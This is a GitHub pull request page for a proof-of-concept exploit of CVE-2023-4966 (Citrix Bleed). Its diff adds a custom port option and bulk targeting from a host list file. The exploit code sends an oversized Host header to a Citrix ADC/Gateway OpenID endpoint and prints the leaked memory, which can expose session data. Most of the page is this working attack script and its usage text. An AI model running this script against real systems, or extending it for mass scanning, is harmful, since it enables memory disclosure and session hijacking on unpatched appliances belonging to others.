Skip to content

added custom port and ability to supply a list of hosts #5

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 2 commits into
base: main
Choose a base branch
from
Open

added custom port and ability to supply a list of hosts #5

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
75e6edf
added custom port and ability to supply a list of hosts and custom port
ZephrFish Nov 7, 2023
19ac390
added additional options
ZephrFish Nov 7, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 5 additions & 3 deletions citrix/CVE-2023-4966/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -7,9 +7,11 @@ Read more at our blog: [https://www.assetnote.io/resources/research/citrix-bleed
# Usage:

```
usage: exploit.py [-h] [--target TARGET]
usage: exploit.py [-h] [--target TARGET] [--port PORT] [--file FILE]

optional arguments:
-h, --help show this help message and exit
--target TARGET The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
-h, --help show this help message and exit
--target TARGET The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
-p PORT, --port PORT Default target port
--file FILE Path to a text file containing a list of hosts, one per line
```
28 changes: 20 additions & 8 deletions citrix/CVE-2023-4966/exploit.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -8,22 +8,34 @@

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
parser.add_argument("-p", "--port", help = "Target port", default = 443)
parser.add_argument('--file', help='Path to a text file containing a list of hosts, one per line')
args = parser.parse_args()

if args.target is None:
print('Target must be provided (e.g. --target 192.168.1.200)')
if args.target is None and args.file is None:
print('Either a target or a file containing hosts must be provided (e.g., --target 192.168.1.200 or --file hosts.txt)')
sys.exit(0)

hostname = args.target

if __name__ == "__main__":
def test_host(hostname, port):
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
r = requests.get(f"https://{hostname}:{port}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False, timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(f"--- Dumped Memory for {hostname}:{port} ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
print(f"Could not dump memory for {hostname}:{port}")

if args.target:
hostname = args.target
port = int(args.port)
test_host(hostname, port)

if args.file:
with open(args.file, 'r') as file:
for line in file:
hostname = line.strip()
port = int(args.port)
test_host(hostname, port)